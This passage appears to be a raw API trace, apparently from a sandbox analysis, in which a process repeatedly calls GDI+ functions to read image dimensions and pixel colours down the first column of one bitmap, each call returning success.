returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=92, color=0x52e3a0) returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=93, color=0x52e3a0) returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=94, color=0x52e3a0) returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=95, color=0x52e3a0) returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=96, color=0x52e3a0) returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=97, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=98, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=99, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=100, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=101, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=102, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=103, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=104, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=105, color=0x52e3a0) returned 0x0 [0192.015] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.015] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.015] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=106, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=107, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=108, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=109, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=110, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=111, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=112, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=113, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=114, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.016] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=115, color=0x52e3a0) returned 0x0 [0192.016] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.016] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=116, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=117, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=118, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=119, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=120, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=121, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=122, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=123, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=124, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.017] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=125, color=0x52e3a0) returned 0x0 [0192.017] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.017] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=126, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=127, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=128, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=129, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=130, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=131, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=132, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=133, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=134, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.018] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.018] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=135, color=0x52e3a0) returned 0x0 [0192.018] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=136, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=137, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=138, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=139, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=140, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=141, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=142, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=143, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=144, color=0x52e3a0) returned 0x0 [0192.019] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.019] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.019] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=145, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=146, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=147, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=148, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=149, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=150, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=151, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=152, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=153, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.020] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=154, color=0x52e3a0) returned 0x0 [0192.020] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.020] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.021] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=155, color=0x52e3a0) returned 0x0 [0192.021] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.021] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.021] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=156, color=0x52e3a0) returned 0x0 [0192.021] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.021] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.021] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=157, color=0x52e3a0) returned 0x0 [0192.021] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.021] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.021] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=158, color=0x52e3a0) returned 0x0 [0192.021] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.021] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.021] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=159, color=0x52e3a0) returned 0x0 [0192.021] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.021] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.021] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=160, color=0x52e3a0) returned 0x0 [0192.021] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.021] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.021] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=161, color=0x52e3a0) returned 0x0 [0192.021] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.021] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.021] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=162, color=0x52e3a0) returned 0x0 [0192.021] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=163, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=164, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=165, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=166, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=167, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=168, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=169, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=170, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=171, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.022] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.022] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=172, color=0x52e3a0) returned 0x0 [0192.022] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=173, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=174, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=175, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=176, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=177, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=178, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=179, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=180, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.023] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=181, color=0x52e3a0) returned 0x0 [0192.023] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.023] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=182, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=183, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=184, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=185, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=186, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=187, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=188, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=189, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=190, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.024] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.024] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=191, color=0x52e3a0) returned 0x0 [0192.024] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=192, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=193, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=194, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=195, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=196, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=197, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 